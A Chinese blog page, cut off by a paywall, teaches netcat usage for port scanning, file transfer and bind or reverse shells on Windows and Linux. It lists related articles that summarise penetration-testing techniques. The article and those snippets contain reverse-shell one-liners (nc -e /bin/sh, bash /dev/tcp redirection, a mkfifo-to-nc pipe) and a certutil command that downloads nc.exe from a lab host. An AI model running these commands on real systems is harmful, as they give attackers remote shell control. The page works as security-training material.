Windows/Linux 下nc 反弹shell

最新推荐文章于 2025-02-21 19:45:15 发布

SoulCat.

最新推荐文章于 2025-02-21 19:45:15 发布

阅读量1.4w

点赞数 9

分类专栏：渗透杂项文章标签： nc 反弹shll

本文链接：https://blog.youkuaiyun.com/csacs/article/details/91440568

版权

本文介绍了netcat（nc）在Windows和Linux系统下如何实现反弹shell的操作，包括nc的基本概念、反弹shell的原理以及如何利用nc与其他编程语言配合进行反弹shell。还提到了在没有nc的情况下，可以使用Bash、Python、PHP、Perl和Ruby等工具实现。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Windows/Linux 下nc 反弹shell

 高二那年班主任对我们说：其实我并不反对你们谈恋爱,
	                 只是你们记得要找一个有担当的,
	                     那些一看见老师就松开你手的，要来有什么用？

NC概述:

nc又名netcat，一个简单而有用的工具，可以干很多事情，但是不可以吃。
何为反弹shell？为什么不反弹攻击?
相信你有一天可以直接把所有攻击反弹回去的.

常用命令

banner获取

nc -nv ip port

连接远程主机

nc -nvv ip port

端口扫描

nc -v ip port            //指定端口
nc -v -z  ip 1-1555         //指定端口段

文件传输

nc  -lvp  8888 < test.txt  服务端
nc -nv 服务端ip 8888 > test.txt 客户端

获取shell

正向shell：客户端想要获取服务器shell

	客户端监听
nc -lvp 8888 -e /bin/sh 
nc -lvp 8888 -e c:\windows\system32\cmd.exe 
	服务端反弹
	nc 服务端ip 8888

反向shell：服务端想要获取客户端

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

SoulCat.

关注关注

9
点赞
踩
30

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Linux/Windows反弹shell

weixin_45253622的博客

05-28

2668

目录食用 Linux反弹shell bash反弹加密bash反弹shell的流量 Python反弹 nc反弹 Telnet反弹 socat反弹其他命令反弹 Windows反弹shell Powershell反弹nc shell 使用MSF反弹shell Linux反弹shell 攻击机：192.168.41.142 靶机：192.168.41.138 bash反弹 Linux 反弹 shell 使用下面这条命令，该命令弹回来的shell是不可交互的，也就是比如vim...

Linux渗透之反弹Shell命令解析

deeplearnings的博客

08-18

1万+

前言当我们在渗透Linux主机时，反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”，会出现一大堆相关文章，但是其内容不但雷同，而且都仅仅是告诉我们执行这个命令就可以反弹shell了，却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普，那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B

参与评论您还未登录，请先登录后发表或查看评论

Linux反弹Shell总结

qq_45600801的博客

01-06

4411

反弹姿势 1、NC正向反弹靶机： nc -lvvp 靶机端口 -e /bin/sh 攻击机： nc 靶机ip 靶机端口 2、NC反向反弹（1）、可使用-e参数：靶机： nc x.x.x.x 8888 -e /bin/bash 攻击机： nc -lvvp 8888 （2）、NC，无-e参数反弹shell 有些版本的NC可能不支持-e选项，不能使用-e，则：方法一： rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc

Linux提权之反弹shell命令(二)

最新发布

2303_78851087的博客

02-21

992

Linux提权之反弹shell命令(二)

Windows反弹Shell

qq_62073002的博客

04-26

1230

正向shell: 控制端主动发起连接请求去连接被控制端，中间网络链路不存在阻碍。反向shell(反弹shell)︰被控端主动发起连接请求去连接控制端，通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机：win11攻击机：vps。

NC反弹shell

Palpitate_LL的博客

09-13

893

c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议，默认是TCP-v 显示命令执行过程，使用-vv显示更详细信息。

反弹shell的方式——之NC反弹shell

aihua002的博客

07-24

752

反弹shell是指在攻击机监听某个端口，然后通过目标连接攻击机监听的端口，在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制，导致无法持续控制目标，或者执行命令受阻等情况时需要进行反弹shell。

nc--反弹shell

wzhua的博客

08-04

3119

nc--反弹shell，小实验

利用NC反弹shell

Chales123的博客

01-17

396

正常情况下shell只能由主机的用户使用，但是反弹shell的目的则是将自己的shell反弹给别的主机，让别的主机可以通过shell来控制自己。举例：假设我们攻击了一台主机，打开了该主机的一个端口，攻击者在自己的主机上去连接目标机器(目标ip：目标机器端口)，这是比较常规的方式，叫做正向连接。4.对于病毒、木马，受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是最好的办法。2.目标主机的ip是动态改变的，不能持续控制。

Linux下NC反弹shell命令（推荐）

09-15

本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作，并提供其他编程语言的反弹Shell命令作为参考。首先，攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成： ...

nc的使用+反弹shell

2301_80366980的博客

02-18

1493

记录学习linux中nc的使用，以及反弹shell仅供个人学习,如有冒犯请尽快联系。

利用nc反弹cmdshell提权

01-27

利用nc反弹cmdshell提权利用nc反弹cmdshell提权利用nc反弹cmdshell提权

详解NC反弹shell的几种方法

01-08

假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统，ip为：192.168.0.4，开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令，然后kali上再进行nc监听，即可反弹shell。需要目标机安装nc。反向反弹shell 方法1：bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用

windows10环境下nc命令工具

08-01

windows环境下nc命令工具,netcat 1.11 for Win32/Win64

反弹Shell方法论，Windows篇

大河之犬的博客

10-10

1599

使用它你可以轻易的建立任何连接。要创建Powershell反向Shell，黑客需要在目标系统上运行一个恶意的Powershell脚本，该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术，用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本，用于建立与目标系统的反向连接。在计算机网络上，OpenSSL 是一个开放源代码的软件库包，应用程序可以使用这个包来进行安全通信，避免窃听，同时确认另一端连接者的身份。

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell

热门推荐

一只特立独行的兔先森

10-23

2万+

假设在内网环境中发现主机，通过漏洞获取到该主机控制权限，想要进一步对内网环境进行后续利用，这里可以通过反弹shell的方式去进行穿透，本次实验以nc工具为例来演示不同系统的操作

使用nc反弹shell方法

baidu_33260220的博客

05-08

6629

hacker机：192.168.1.1 目标机：192.168.1.2 1、在hacker机执行 nc -vlp 9999 （监听本机9999端口） 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹回shell

[保姆级教程]-通过NC反弹shell实战

qq_43681532的博客

02-19

334

环境工具步骤。

NC反弹shell实验

2301_79713335的博客

07-21

229

执行命令 certutil.exe -urlcache -split -f http://192.168.163.128:80/nc.exe n.exe 从而将nc上传到目标靶机。(此实验为使用虚拟机简单搭建的内网环境来模拟3台在公网上的设备公网的话同理但只是对于目标主机是处于公网但如果目标主机处于内网中需要搭建隧道等知识)<1>.windows防火墙的规则策略 (入站难出站简单) 从而正向连接(简单) 但是反向连接(难)<2>.windows的IP地址:192.168.163.2(目标)

Linux下如何通过NC反弹shell

05-27

可以通过以下步骤在 Linux 下使用 NC 反弹 shell： 1. 在攻击机器上开放一个监听端口等待连接：`nc -lvp <port>` 2. 在受害机器上执行以下命令，将 shell 通过 NC 连接到攻击机器上： ``` /bin/bash -c "/bin/bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1" ``` 其中，`<attacker_ip>` 是攻击机器的 IP 地址，`<port>` 是攻击机器上开放的监听端口。 3. 在攻击机器上，当受害机器连接成功后，就可以通过该连接获得 shell。注意：在执行以上操作时，请务必确认你的行为符合当地法律法规。此外，这种技术可能会被安全软件识别并拦截，建议仅在法律允许的情况下使用。